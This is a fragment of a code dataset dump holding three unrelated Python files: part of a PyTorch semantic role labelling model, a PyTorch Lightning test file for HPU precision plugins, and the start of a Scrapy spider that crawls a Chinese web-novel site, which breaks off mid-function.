getSpanCandidates(self, length_tensor, max_arg_width):\n max_len = int(max(length_tensor).item())\n sent_num = len(length_tensor)\n '''\n candidate_starts: [sent_num, max_arg_width, max_len]\n [[[ 0., 1., 2., ..., 47., 48., 49.],\n [ 0., 1., 2., ..., 47., 48., 49.],\n [ 0., 1., 2., ..., 47., 48., 49.],\n ...,\n ]]\n '''\n candidate_starts_range = torch.arange(0, max_len)\n if self.use_cuda:\n candidate_starts_range = candidate_starts_range.cuda()\n candidate_starts = torch.unsqueeze(torch.unsqueeze(candidate_starts_range, 0), 1).expand(sent_num, max_arg_width, max_len)\n '''\n candidate_widths: [1, max_arg_width, 1]\n [[[ 0.],\n [ 1.],\n [ 2.],\n [ 3.],\n ...\n ]]\n '''\n candidate_widths_range = torch.arange(0, max_arg_width)\n if self.use_cuda:\n candidate_widths_range = candidate_widths_range.cuda()\n candidate_widths = torch.unsqueeze(torch.unsqueeze(candidate_widths_range, 0), 2)\n '''\n candidate_ends: [sent_num, max_arg_width, max_len] \n [[[ 0., 1., 2., ..., 47., 48., 49.],\n [ 1., 2., 3., ..., 48., 49., 50.],\n [ 2., 3., 4., ..., 49., 50., 51.],\n ...,\n ]]\n '''\n candidate_ends = candidate_starts + candidate_widths\n # [sent_num, max_arg_width * max_len]\n candidate_starts = candidate_starts.contiguous().view(sent_num, max_arg_width * max_len)\n\n # [sent_num, max_arg_width * max_len]\n candidate_ends = candidate_ends.contiguous().view(sent_num, max_arg_width * max_len)\n\n # [sent_num, max_arg_width * max_len]\n candidate_mask = torch.lt(candidate_ends,\n torch.unsqueeze(length_tensor.long(), 1).expand(sent_num, max_arg_width * max_len))\n\n # Mask to avoid indexing error.\n candidate_starts = candidate_starts * candidate_mask.long()\n candidate_ends = candidate_ends * candidate_mask.long()\n\n return candidate_starts, candidate_ends, candidate_mask\n\n def flatten_emb_by_sentence(self, emb, text_len_mask):\n emb_size = emb.size()\n sent_num = emb_size[0]\n max_sent_len = emb_size[1]\n flattened_emb = self.flatten_emb(emb)\n text_len_mask_boardcast = text_len_mask.view(sent_num * max_sent_len).unsqueeze(1).\\\n expand(sent_num * max_sent_len, emb_size[2])\n return torch.masked_select(flattened_emb, text_len_mask_boardcast).view(-1, emb_size[2])\n\n def flatten_emb(self, emb):\n emb_size = emb.size()\n num_sentences = emb_size[0]\n max_sentence_length = emb_size[1]\n emb_rank = len(emb.size())\n if emb_rank == 2:\n flattened_emb = emb.contiguous().view(num_sentences * max_sentence_length)\n elif emb_rank == 3:\n flattened_emb = emb.contiguous().view([num_sentences * max_sentence_length, self.shape(emb, 2)])\n else:\n raise ValueError(\"Unsupported rank: {}\".format(emb_rank))\n return flattened_emb\n\n def shape(self, x, dim):\n return x.size(dim) or x.size(dim)\n\n def projection(self, inputs, output_size, initializer=None):\n return self.ffnn(inputs, 0, -1, output_size, dropout=None, output_weights_initializer=initializer)\n\n def ffnn(self, inputs, num_hidden_layers, hidden_size, output_size, dropout, output_weights_initializer=None):\n if len(inputs.size()) > 2:\n current_inputs = inputs.view(-1, self.shape(inputs, -1))\n else:\n current_inputs = inputs\n\n if num_hidden_layers > 0:\n output0 = torch.relu(self.linear0(current_inputs))\n if dropout is not None:\n output0 = dropout(output0)\n output1 = torch.relu(self.linear1(output0))\n if dropout is not None:\n output1 = dropout(output1)\n current_inputs = output1\n\n outputs = self.output_linear(current_inputs)\n\n if len(inputs.size()) == 3:\n outputs = outputs.view(self.shape(inputs, 0), self.shape(inputs, 1), output_size)\n elif len(inputs.size()) > 3:\n raise ValueError(\"FFNN with rank {} not supported\".format(len(inputs.size())))\n return outputs\n\n def ffnn_(self, inputs, num_hidden_layers, hidden_size, output_size, dropout, output_weights_initializer=None):\n if len(inputs.size()) > 2:\n current_inputs = inputs.view(-1, self.shape(inputs, -1))\n else:\n current_inputs = inputs\n # outputs = None\n if num_hidden_layers == 2:\n output0 = torch.relu(self.linear0(current_inputs))\n if dropout is not None:\n output0 = dropout(output0)\n output1 = torch.relu(self.linear1(output0))\n if dropout is not None:\n output1 = dropout(output1)\n current_inputs = output1\n\n outputs = self.output_linear1(current_inputs)\n\n # if num_hidden_layers == 1:\n # output2 = torch.relu(self.linear2(current_inputs))\n # outputs = self.output_linear2(output2)\n\n if len(inputs.size()) == 3:\n outputs = outputs.view(self.shape(inputs, 0), self.shape(inputs, 1), output_size)\n elif len(inputs.size()) > 3:\n raise ValueError(\"FFNN with rank {} not supported\".format(len(inputs.size())))\n return outputs\n\n def ffnn__(self, inputs, num_hidden_layers, hidden_size, output_size, dropout, output_weights_initializer=None):\n if len(inputs.size()) > 2:\n current_inputs = inputs.contiguous().view(-1, self.shape(inputs, -1))\n else:\n current_inputs = inputs\n # outputs = None\n if num_hidden_layers == 2:\n output2 = torch.relu(self.linear2(current_inputs))\n if dropout is not None:\n output2 = dropout(output2)\n output3 = torch.relu(self.linear3(output2))\n if dropout is not None:\n output3 = dropout(output3)\n current_inputs = output3\n\n outputs = self.output_linear2(current_inputs)\n\n # if num_hidden_layers == 1:\n # output2 = torch.relu(self.linear2(current_inputs))\n # outputs = self.output_linear2(output2)\n\n\n if len(inputs.size()) == 3:\n outputs = outputs.view(self.shape(inputs, 0), self.shape(inputs, 1), output_size)\n elif len(inputs.size()) > 3:\n raise ValueError(\"FFNN with rank {} not supported\".format(len(inputs.size())))\n return outputs\n\n def ffnn___(self, inputs, num_hidden_layers, hidden_size, output_size, dropout, output_weights_initializer=None):\n if len(inputs.size()) > 2:\n current_inputs = inputs.view(-1, self.shape(inputs, -1))\n else:\n current_inputs = inputs\n # outputs = None\n if num_hidden_layers == 2:\n output2 = torch.relu(self.linear4(current_inputs))\n if dropout is not None:\n output2 = dropout(output2)\n output3 = torch.relu(self.linear5(output2))\n if dropout is not None:\n output3 = dropout(output3)\n current_inputs = output3\n\n outputs = self.output_linear3(current_inputs)\n\n if len(inputs.size()) == 3:\n outputs = outputs.view(self.shape(inputs, 0), self.shape(inputs, 1), output_size)\n elif len(inputs.size()) > 3:\n raise ValueError(\"FFNN with rank {} not supported\".format(len(inputs.size())))\n return outputs\n\n def get_unary_scores(self, span_emb, dropout, num_labels=1, flag=''):\n \"\"\"Compute span score with FFNN(span embedding).\n Args:\n span_emb: Tensor of [num_sentences, num_spans, emb].\n \"\"\"\n # span_scores\n # [num_sentences, num_spans, num_labels] or [k, num_labels]\n # scores = self.ffnn_(span_emb, self.config.ffnn_depth, self.config.ffnn_size, num_labels, dropout)\n if flag == 'candidate_pred_scores':\n scores = self.ffnn__(span_emb, self.config.ffnn_depth, self.config.ffnn_size, num_labels, dropout)\n elif flag == 'predicate_argument_scores':\n scores = self.ffnn___(span_emb, self.config.ffnn_depth, self.config.ffnn_size, num_labels, dropout)\n else:\n scores = self.ffnn_(span_emb, self.config.ffnn_depth, self.config.ffnn_size, num_labels, dropout)\n if num_labels == 1:\n scores = scores.squeeze(-1) # [num_sentences, num_spans] or [k]\n return scores\n\n def get_batch_topk(self, candidate_starts, candidate_ends, candidate_scores, topk_ratio, text_len,\n max_sentence_length, sort_spans=False, enforce_non_crossing=True):\n \"\"\"\n Args:\n candidate_starts: [num_sentences, max_num_candidates]\n candidate_mask: [num_sentences, max_num_candidates]\n topk_ratio: A float number.\n text_len: [num_sentences,]\n max_sentence_length:\n enforce_non_crossing: Use regular top-k op if set to False.\n \"\"\"\n num_sentences = self.shape(candidate_starts, 0)\n max_num_candidates = self.shape(candidate_starts, 1)\n\n # [num_sentences]\n floor = torch.floor(text_len.float() * topk_ratio)\n ones = torch.ones([num_sentences, ])\n if self.use_cuda:\n ones = ones.cuda()\n topk = torch.max(floor, other=ones).long()\n\n predicted_indices = self.extractSpans(\n candidate_scores, candidate_starts, candidate_ends, topk, max_sentence_length,\n sort_spans, enforce_non_crossing) # [num_sentences, max_num_predictions]\n # predicted_indices.set_shape([None, None])\n\n # predicted_start = self.batchGather(candidate_starts, predicted_indices) # [num_sentences, max_num_predictions]\n # # predicted_ends = self.batchGather(candidate_ends, predicted_indices) # [num_sentences, max_num_predictions]\n # # predicted_scores = self.batchGather(candidate_scores, predicted_indices) # [num_sentences, max_num_predictions]\n # xqr\n candidate_starts = candidate_starts.cpu()\n candidate_ends = candidate_ends.cpu()\n candidate_scores = candidate_scores.cpu()\n predicted_starts = torch.gather(candidate_starts, 1, predicted_indices)\n predicted_ends = torch.gather(candidate_ends, 1, predicted_indices)\n predicted_scores = torch.gather(candidate_scores, 1, predicted_indices)\n ###\n return predicted_starts, predicted_ends, predicted_scores, topk, predicted_indices\n\n def extractSpans(self, candidate_scores, candidate_starts, candidate_ends, topk, max_sentence_length,\n sort_spans, enforce_non_crossing):\n _sort_spans = sort_spans\n _suppress_crossing = enforce_non_crossing # do not it is right !!!\n\n span_scores = candidate_scores\n candidate_starts = candidate_starts\n candidate_ends = candidate_ends\n num_output_spans = topk\n max_sentence_length = max_sentence_length\n\n\n # xqr\n max_num_output_spans = int(torch.max(topk))\n indices = [score.topk(k)[1] for score, k in zip(candidate_scores, topk)]\n output_span_indices_tensor = [F.pad(item, [0, max_num_output_spans - item.size()[0]], value=item[-1]) for item in indices]\n output_span_indices = torch.stack(output_span_indices_tensor).cpu()\n ###\n # num_sentences = span_scores.size(0)\n # num_input_spans = span_scores.size(1)\n # max_num_output_spans = 0\n # for i in range(num_sentences):\n # if num_output_spans[i] > max_num_output_spans:\n # max_num_output_spans = num_output_spans[i]\n #\n # output_span_indices = torch.zeros((num_sentences, int(max_num_output_spans.item()))).int()\n # sorted_input_span_indices = torch.zeros((num_sentences, num_input_spans))\n # if self.use_cuda:\n # output_span_indices = output_span_indices.cuda()\n # sorted_input_span_indices = sorted_input_span_indices.cuda()\n # for i in range(num_sentences):\n # for j in range(num_input_spans):\n # sorted_input_span_indices[i][j] = j\n # _, index = torch.sort(span_scores[i], descending=True)\n # # index = index.tolist()\n # sorted_input_span_indices[i] = sorted_input_span_indices[i][index]\n #\n # for l in range(num_sentences):\n # top_span_indices = []\n # # end_to_earliest_start = {}\n # # start_to_latest_end = {}\n # current_span_index, num_selected_spans = 0, 0\n # while num_selected_spans < num_output_spans[l] and current_span_index < num_input_spans:\n # i = sorted_input_span_indices[l][current_span_index]\n # any_crossing = False\n # if not any_crossing:\n # if sort_spans:\n # top_span_indices.append(i)\n # else:\n # output_span_indices[l][num_selected_spans] = i\n # num_selected_spans += 1\n # current_span_index += 1\n # last_selected = num_selected_spans - 1\n # if last_selected >= 0:\n # for i in range(num_selected_spans, int(max_num_output_spans.item())):\n # output_span_indices[l][i] = output_span_indices[l][last_selected]\n\n return output_span_indices\n\n def batchGather(self, emb, indices):\n # TODO: Merge with util.batch_gather.\n \"\"\"\n Args:\n emb: Shape of [num_sentences, max_sentence_length, (emb)]\n indices: Shape of [num_sentences, k, (l)]\n \"\"\"\n num_sentences = emb.size(0)\n max_sentence_length = emb.size(1)\n emb_size = emb.size()\n flattened_emb = self.flatten_emb(emb) # [num_sentences * max_sentence_length, emb]\n num_sentences_range = torch.arange(0, num_sentences)\n # if self.use_cuda:\n # num_sentences_range = num_sentences_range.cuda()\n offset = (num_sentences_range * max_sentence_length).unsqueeze(1) # [num_sentences, 1]\n if len(indices.size()) == 3:\n offset = offset.unsqueeze(2) # [num_sentences, 1, 1]\n indice_offset = indices.long() + offset.long()\n indice_offset_size = indice_offset.size()\n indice_offset = indice_offset.view(-1)\n selected = torch.index_select(flattened_emb.cpu(), 0, indice_offset)\n if len(emb_size) > 2:\n selected = selected.view(indice_offset_size[0], indice_offset_size[1], emb_size[-1])\n else:\n selected = selected.view(indice_offset_size)\n if self.use_cuda:\n selected = selected.cuda()\n return selected\n\n def get_dense_span_labels(self, span_starts, span_ends, span_labels, num_spans, max_sentence_length, span_parents=None):\n \"\"\"Utility function to get dense span or span-head labels.\n Args:\n span_starts: [num_sentences, max_num_spans]\n span_ends: [num_sentences, max_num_spans]\n span_labels: [num_sentences, max_num_spans]\n num_spans: [num_sentences,]\n max_sentence_length:\n span_parents: [num_sentences, max_num_spans]. Predicates in SRL.\n \"\"\"\n num_sentences = span_starts.size(0)\n max_num_spans = span_starts.size(1)\n if self.use_cuda:\n span_starts = span_starts.cuda()\n # For padded spans, we have starts = 1, and ends = 0, so they don't collide with any existing spans.\n sequence_mask_result = self.sequence_mask(num_spans, maxlen=int(max(num_spans).item()), dtype=torch.int32).long()\n span_starts += (1 - sequence_mask_result) # [num_sentences, max_num_spans]\n num_sentences_range = torch.arange(0, num_sentences)\n if self.use_cuda:\n num_sentences_range = num_sentences_range.cuda()\n sentence_indices = num_sentences_range.unsqueeze(1).expand(num_sentences, max_num_spans) # [num_sentences, max_num_spans]\n sparse_indices = torch.cat([\n sentence_indices.unsqueeze(2),\n span_starts.unsqueeze(2),\n span_ends.unsqueeze(2)], dim=2) # [num_sentences, max_num_spans, 3]\n if span_parents is not None:\n pre_start_tensor, pre_end_tensor = span_parents\n sparse_indices = torch.cat([sparse_indices, pre_start_tensor.unsqueeze(2), pre_end_tensor.unsqueeze(2)], dim=2) # [num_sentenes, max_num_spans, 4]\n\n rank = 3 if (span_parents is None) else 5\n # (sent_id, span_start, span_end) -> span_label\n # sparse to dense\n sparse_indices = sparse_indices.view(num_sentences * max_num_spans, rank)\n # output_shape = [num_sentences, max_sentence_length, max_sentence_length, max_sentence_length]\n # default_value = 0\n # sparse_values = span_labels.view(-1)\n # xqr\n dense_labels = torch.sparse.FloatTensor(sparse_indices.cpu().view(num_sentences * max_num_spans, rank).t(),\n span_labels.view(-1).type(torch.FloatTensor),\n torch.Size(\n [num_sentences] + [max_sentence_length] * (rank - 1))).to_dense()\n ###\n # dense_label = torch.zeros(num_sentences, max_sentence_length, max_sentence_length, max_sentence_length)\n # if self.use_cuda:\n # dense_label = dense_label.cuda()\n # for idx, value in enumerate(sparse_values):\n # i, j, k, t = sparse_indices[idx]\n # dense_label[i][j][k][t] = value\n\n return dense_labels\n\n def gather_5d(self, params, indices): # ugly\n assert len(params.size()) == 5 and len(indices.size()) == 4\n # print params.size(), indices.size()\n # exit()\n params = params.type(torch.LongTensor)\n indices_a, indices_b, indices_c, indices_d, indices_e = indices.chunk(5, dim=3)\n result = params[indices_a, indices_b, indices_c, indices_d, indices_e]\n # result = torch.zeros(indices.size()[:3]).type(torch.LongTensor)\n #\n # for i in range(indices.size()[0]):\n # for j in range(indices.size()[1]):\n # for k in range(indices.size()[2]):\n # result[i][j][k] = params[indices[i][j][k][0]][indices[i][j][k][1]][indices[i][j][k][2]][indices[i][j][k][3]]\n return result.unsqueeze(3)\n\n def get_srl_labels(self, arg_starts, arg_ends, pred_starts, pred_ends, labels, max_sentence_length):\n \"\"\"\n Args:\n arg_starts: [num_sentences, max_num_args]\n arg_ends: [num_sentences, max_num_args]\n predicates: [num_sentences, max_num_predicates]\n labels: Dictionary of label tensors.\n max_sentence_length: An integer scalar.\n \"\"\"\n # arg_starts = output_dic['arg_starts']\n # arg_ends = output_dic['arg_ends']\n # predicates = output_dic['predicates']\n num_sentences = arg_starts.size(0)\n max_num_args = arg_starts.size(1)\n max_num_preds = pred_starts.size(1)\n num_sentences_range = torch.arange(0, num_sentences)\n # if self.use_cuda:\n # num_sentences_range = num_sentences_range.cuda()\n sentence_indices_2d = num_sentences_range. \\\n unsqueeze(1).unsqueeze(2). \\\n expand(num_sentences, max_num_args, max_num_preds) # [num_sentences, max_num_args, max_num_preds, max_num_preds]\n tiled_arg_starts = arg_starts.unsqueeze(2). \\\n expand(arg_ends.size(0), arg_ends.size(1), max_num_preds) # [num_sentences, max_num_args, max_num_preds, max_num_preds]\n tiled_arg_ends = arg_ends.unsqueeze(2). \\\n expand(arg_ends.size(0), arg_ends.size(1), max_num_preds) # [num_sentences, max_num_args, max_num_preds, max_num_preds]\n tiled_pred_starts = pred_starts.unsqueeze(1). \\\n expand(pred_starts.size(0), max_num_args, pred_starts.size(1)) # [num_sentences, max_num_args, max_num_preds, max_num_preds]\n tiled_pred_ends = pred_ends.unsqueeze(1). \\\n expand(pred_ends.size(0), max_num_args, pred_ends.size(1)) # [num_sentences, max_num_args, max_num_preds, max_num_preds]\n tiled_arg_starts = tiled_arg_starts.cpu()\n tiled_arg_ends = tiled_arg_ends.cpu()\n tiled_pred_starts = tiled_pred_starts.cpu()\n tiled_pred_ends = tiled_pred_ends.cpu()\n pred_indices = torch.cat([\n sentence_indices_2d.unsqueeze(3),\n tiled_arg_starts.unsqueeze(3),\n tiled_arg_ends.unsqueeze(3),\n tiled_pred_starts.unsqueeze(3),\n tiled_pred_ends.unsqueeze(3)], dim=3) # [num_sentences, max_num_args, max_num_preds, max_num_preds, 4]\n\n dense_srl_labels = self.get_dense_span_labels(\n labels[\"arg_start_tensor\"], labels[\"arg_end_tensor\"], labels[\"arg_label_tensor\"], labels[\"srl_len_tensor\"],\n max_sentence_length,\n span_parents=(labels[\"pre_start_tensor\"], labels[\"pre_end_tensor\"])) # [num_sentences, max_sent_len, max_sent_len, max_sent_len]\n\n # srl_labels = torch.index_select(dense_srl_labels, 3, pred_indices.long()) # [num_sentences, max_num_args]\n # srl_labels = torch.zeros((num_sentences, max_num_args, max_num_preds))\n # if self.use_cuda:\n # srl_labels = srl_labels.cuda()\n # pred_indices = pred_indices.long() # [num_sentences, max_num_args, max_num_preds]\n # for i in range(num_sentences):\n # for j in range(max_num_args):\n # for k in range(max_num_preds):\n # index = pred_indices[i][j][k]\n # srl_labels[i][j][k] = dense_srl_labels[index[0]][index[1]][index[2]][index[3]]\n\n srl_labels = self.gather_5d(dense_srl_labels, pred_indices.type(torch.LongTensor))\n\n return srl_labels\n\n def get_srl_scores(self, arg_emb, pred_emb, arg_scores, pred_scores, num_labels, config, dropout):\n num_sentences = self.shape(arg_emb, 0)\n num_args = self.shape(arg_emb, 1)\n num_preds = self.shape(pred_emb, 1)\n\n arg_emb_expanded = arg_emb.unsqueeze(2) # [num_sents, num_args, 1, emb]\n pred_emb_expanded = pred_emb.unsqueeze(1) # [num_sents, 1, num_preds, emb]\n\n arg_emb_size = arg_emb_expanded.size()\n # [num_sentences, num_args, num_preds, emb]\n arg_emb_tiled = arg_emb_expanded.expand(arg_emb_size[0], arg_emb_size[1], num_preds, arg_emb_size[3])\n\n pred_emb_size = pred_emb_expanded.size()\n # [num_sents, num_args, num_preds, emb]\n pred_emb_tiled = pred_emb_expanded.expand(pred_emb_size[0], num_args, pred_emb_size[2], pred_emb_size[3])\n\n pair_emb_list = [arg_emb_tiled, pred_emb_tiled]\n pair_emb = torch.cat(pair_emb_list, 3) # [num_sentences, num_args, num_preds, emb]\n pair_emb_size = self.shape(pair_emb, 3)\n flat_pair_emb = pair_emb.view(num_sentences * num_args * num_preds, pair_emb_size)\n\n flat_srl_scores = self.get_unary_scores(flat_pair_emb, dropout, num_labels - 1,\n \"predicate_argument_scores\") # [num_sentences * num_args * num_predicates, 1]\n srl_scores = flat_srl_scores.view(num_sentences, num_args, num_preds, num_labels - 1)\n if self.use_cuda:\n arg_scores = arg_scores.cuda()\n pred_scores = pred_scores.cuda()\n srl_scores = srl_scores + arg_scores.unsqueeze(2).unsqueeze(3) + pred_scores.unsqueeze(1).unsqueeze(3) # [num_sentences, 1, max_num_preds, num_labels-1]\n\n dummy_scores = torch.zeros([num_sentences, num_args, num_preds, 1]).float()\n if self.use_cuda:\n dummy_scores = dummy_scores.cuda()\n srl_scores = torch.cat([dummy_scores, srl_scores],\n 3) # [num_sentences, max_num_args, max_num_preds, num_labels]\n return srl_scores # [num_sentences, num_args, num_predicates, num_labels]\n\n def get_srl_softmax_loss(self, srl_scores, srl_labels, num_predicted_args, num_predicted_preds):\n max_num_arg = srl_scores.size()[1]\n max_num_pred = srl_scores.size()[2]\n num_labels = srl_scores.size()[3]\n\n args_mask = self.sequence_mask(num_predicted_args, max_num_arg)\n # print args_mask.sum()\n pred_mask = self.sequence_mask(num_predicted_preds, max_num_pred)\n # print pred_mask.sum()\n srl_loss_mask = Variable((args_mask.unsqueeze(2) == 1) & (pred_mask.unsqueeze(1) == 1))\n\n srl_scores = srl_scores.view(-1, num_labels)\n # print \"srl labels\", torch.sum(srl_labels)\n srl_labels = Variable(srl_labels.view(-1, 1))\n if self.use_cuda:\n srl_labels = srl_labels.cuda()\n # print srl_scores, srl_labels.size()\n output = F.log_softmax(srl_scores, 1) #* Variable(srl_labels.view(-1)).cuda()\n\n negative_log_likelihood_flat = -torch.gather(output, dim=1, index=srl_labels).view(-1)\n # print torch.sum(srl_loss_mask.type(torch.FloatTensor))\n srl_loss_mask = (srl_loss_mask.view(-1) == 1).nonzero().view(-1)\n # print srl_loss_mask.size()\n # print negative_log_likelihood_flat\n negative_log_likelihood = torch.gather(negative_log_likelihood_flat, dim=0, index=srl_loss_mask)\n # negative_log_likelihood = negative_log_likelihood_flat.view(*srl_labels.size()) # [B, T]\n # negative_log_likelihood = negative_log_likelihood_flat * srl_loss_mask.view(-1).float()\n # print negative_log_likelihood\n # z = ((torch.ones_like(negative_log_likelihood) * 75217952 - negative_log_likelihood) != 0).nonzero()\n # print z\n # print negative_log_likelihood.view(-1).index_select(dim=0, index=z.view(-1))\n loss = negative_log_likelihood.sum()\n return loss\n\n def get_srl_softmax_loss1(self, srl_scores, srl_labels, num_predicted_args, num_predicted_preds):\n \"\"\"Softmax loss with 2-D masking (for SRL).\n Args:\n srl_scores: [num_sentences, max_num_args, max_num_preds, num_labels]\n srl_labels: [num_sentences, max_num_args, max_num_preds]\n num_predicted_args: [num_sentences]\n num_predicted_preds: [num_sentences]\n \"\"\"\n\n max_num_args = self.shape(srl_scores, 1)\n max_num_preds = self.shape(srl_scores, 2)\n num_labels = self.shape(srl_scores, 3)\n args_mask = self.sequence_mask(num_predicted_args, max_num_args) # [num_sentences, max_num_args]\n preds_mask = self.sequence_mask(num_predicted_preds, max_num_preds) # [num_sentences, max_num_preds]\n # args_mask.unsqueeze(2) # [num_sentences, max_num_args, 1]\n # preds_mask.unsqueeze(1) # [num_sentences, 1, max_num_preds]\n srl_loss_mask = args_mask.unsqueeze(2) & preds_mask.unsqueeze(1) # [num_sentences, max_num_args, max_num_preds]\n logp = torch.nn.functional.log_softmax(srl_scores.view(-1, num_labels)[srl_loss_mask.view(-1)])\n srl_labels_masked = Variable(srl_labels.view(-1)[srl_loss_mask.view(-1)].view(-1, 1))\n if self.use_cuda:\n srl_labels_masked = srl_labels_masked.cuda()\n logpy = torch.gather(logp, 1, srl_labels_masked.long())\n loss = -(logpy).sum()\n # loss = F.cross_entropy(\n # input=srl_scores.view(-1, num_labels),\n # target=srl_labels.view(-1).long()\n # ) # [num_sentences * max_num_args * max_num_preds]\n # loss = tf.boolean_mask(loss, srl_loss_mask.view(-1))\n # loss.set_shape([None])\n # loss = tf.reduce_sum(loss)\n return loss","sub_path":"driver/ORLModel.py","file_name":"ORLModel.py","file_ext":"py","file_size_in_byte":50527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"296802289","text":"# Copyright The PyTorch Lightning team.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport pytest\nimport torch\n\nfrom pytorch_lightning import Callback, LightningModule, Trainer\nfrom pytorch_lightning.demos.boring_classes import BoringModel\nfrom pytorch_lightning.plugins import HPUPrecisionPlugin\nfrom pytorch_lightning.strategies.single_hpu import SingleHPUStrategy\nfrom tests_pytorch.helpers.runif import RunIf\n\n\n@pytest.fixture\ndef hmp_params(request):\n return {\n \"opt_level\": \"O1\",\n \"verbose\": False,\n \"bf16_file_path\": request.config.getoption(\"--hmp-bf16\"),\n \"fp32_file_path\": request.config.getoption(\"--hmp-fp32\"),\n }\n\n\n@RunIf(hpu=True)\ndef test_precision_plugin(hmp_params):\n plugin = HPUPrecisionPlugin(precision=\"bf16\", **hmp_params)\n assert plugin.precision == \"bf16\"\n\n\n@RunIf(hpu=True)\ndef test_mixed_precision(tmpdir, hmp_params: dict):\n class TestCallback(Callback):\n def setup(self, trainer: Trainer, pl_module: LightningModule, stage: str) -> None:\n assert trainer.strategy.model.precision == \"bf16\"\n raise SystemExit\n\n model = BoringModel()\n trainer = Trainer(\n default_root_dir=tmpdir,\n fast_dev_run=True,\n accelerator=\"hpu\",\n devices=1,\n plugins=[HPUPrecisionPlugin(precision=\"bf16\", **hmp_params)],\n callbacks=TestCallback(),\n )\n assert isinstance(trainer.strategy, SingleHPUStrategy)\n assert isinstance(trainer.strategy.precision_plugin, HPUPrecisionPlugin)\n assert trainer.strategy.precision_plugin.precision == \"bf16\"\n with pytest.raises(SystemExit):\n trainer.fit(model)\n\n\n@RunIf(hpu=True)\ndef test_pure_half_precision(tmpdir, hmp_params: dict):\n class TestCallback(Callback):\n def on_train_start(self, trainer: Trainer, pl_module: LightningModule) -> None:\n assert trainer.strategy.model.precision == \"16\"\n for param in trainer.strategy.model.parameters():\n assert param.dtype == torch.float16\n raise SystemExit\n\n model = BoringModel()\n model = model.half()\n trainer = Trainer(\n default_root_dir=tmpdir,\n fast_dev_run=True,\n accelerator=\"hpu\",\n devices=1,\n plugins=[HPUPrecisionPlugin(precision=16, **hmp_params)],\n callbacks=TestCallback(),\n )\n\n assert isinstance(trainer.strategy, SingleHPUStrategy)\n assert isinstance(trainer.strategy.precision_plugin, HPUPrecisionPlugin)\n assert trainer.strategy.precision_plugin.precision == \"16\"\n\n with pytest.raises(RuntimeError, match=r\"float16/half is not supported on Gaudi.\"):\n trainer.fit(model)\n\n\n@RunIf(hpu=True)\ndef test_unsupported_precision_plugin():\n with pytest.raises(ValueError, match=r\"accelerator='hpu', precision='mixed'\\)` is not supported.\"):\n HPUPrecisionPlugin(precision=\"mixed\")\n","sub_path":"tests/tests_pytorch/plugins/precision/hpu/test_hpu.py","file_name":"test_hpu.py","file_ext":"py","file_size_in_byte":3353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"126396259","text":"#!/usr/bin/python\n# coding: utf-8\n\nimport re\nimport scrapy\nfrom bs4 import BeautifulSoup\nfrom scrapy.http import Request # 跟进URL的时候用\nfrom dingdian_scrapy.items import DingdianScrapyItem, DcontentItem\nfrom dingdian_scrapy.mysqlpipelines.sql import Sql\n\n\nclass Myspider(scrapy.Spider):\n \"\"\"\n 定义爬虫方法的类,继承自scrapy.Spider类\n start_requests\n parse\n get_name\n get_chapterurl\n get_chaptercontent\n \"\"\"\n name = 'dingdian' # entrypoint.py中的对应的第三个参数,此名字整个项目有且只能有一个\n allowed_domains = ['23us.com'] # 爬取规则,只会跟进存在于此的URL\n bash_url = 'http://www.23us.com/class/' # 分类的基本url\n bashurl = '.html' # url拼接使用\n\n def start_requests(self):\n \"\"\"\n 拼接发现的小说分类的URL\n 散文诗词:http://www.23wx.com/class/9_1.html\n 用yield将函数变为生成器,每次返回一个可迭代的对象\n Request使用回调函数,将请求的response作为参数传递给self.parse\n \"\"\"\n for i in range(1, 11):\n # 遍历拼接URL\n url = self.bash_url + str(i) + '_1' + self.bashurl\n # 使用Request包,跟进URL(返回的response作为参数传递给self.parse, 这个叫回调函数!)\n yield Request(url, callback=self.parse)\n\n def parse(self, response):\n \"\"\"\n 提取最大分页,拼接遍历的URL,遍历该类型的所有分页\n 回调处理response获取小说名字\n \"\"\"\n # 提取最大分页\n max_num = BeautifulSoup(response.text, 'lxml').find(\n 'div', class_='pagelink').find_all('a')[-1].get_text()\n # 打印response的URL\n print(response.url)\n # 对应的时start_requests方法中拼接的URL,截至倒数第七位\n # http://www.23wx.com/class/9(_1.html)\n bashurl = str(response.url)[:-7]\n # 遍历所有的页面\n for num in range(1, int(max_num) + 1):\n url = bashurl + '_' + str(num) + self.bashurl\n yield Request(url, callback=self.get_name)\n \"\"\"\n yield Request,请求新的URL,后面是回调函数,\n 需要哪一个函数来处理返回值,就调用那一个函数,\n 返回值会以参数的形式传递给所调用的函数。\n \"\"\"\n\n def get_name(self, response):\n \"\"\"\n 提取小说的名字和��接,并传入self.get_chapterurl\n 通过meta字典传递Scrapy的额外数据\n \"\"\"\n # bs提取所有的属性符合的tr标签\n tds = BeautifulSoup(response.text, 'lxml').find_all(\n 'tr', bgcolor='#FFFFFF')\n # 遍历标签获取小说的name和url\n for td in tds:\n novelname = td.find('a').get_text()\n novelurl = td.find('a')['href']\n # meta字典,是Scrapy传递额外数据的方法\n yield Request(novelurl,\n callback=self.get_chapterurl,\n meta={'name': novelname, 'url': novelurl})\n\n def get_chapterurl(self, response):\n \"\"\"\n 将请求获得的数据都存入DingdianScrapyItem的实例中,并返回一个iterable的item用于pipelines\n 请求章节列表的地址,交由self.get_chapter处理\n \"\"\"\n # 实例化DingdianScrapyItem()类,事先定义好的数据模型\n item = DingdianScrapyItem()\n # 替换空格的字符表达,并存入item的name字段\n item['name'] = str(response.meta['name']).replace(\n '\\xa0', '')\n # 将数据存入item对应的字段\n item['novelurl'] = response.meta['url']\n # 提取小说的连载状态\n serialstatus = BeautifulSoup(response.text, 'lxml').find(\n 'table').find_all('td')[2].get_text()\n # 提取小说目前的连载字数\n serialnumber = BeautifulSoup(response.text, 'lxml').find(\n 'table').find_all('td')[4].get_text()\n # 提取小说的类型\n category = BeautifulSoup(response.text, 'lxml').find(\n 'table').find('a').get_text()\n # 提取小说的作者\n author = BeautifulSoup(response.text, 'lxml').find(\n 'table').find_all('td')[1].get_text()\n # 提取小说的阅读地址(所有的章节)\n bash_url 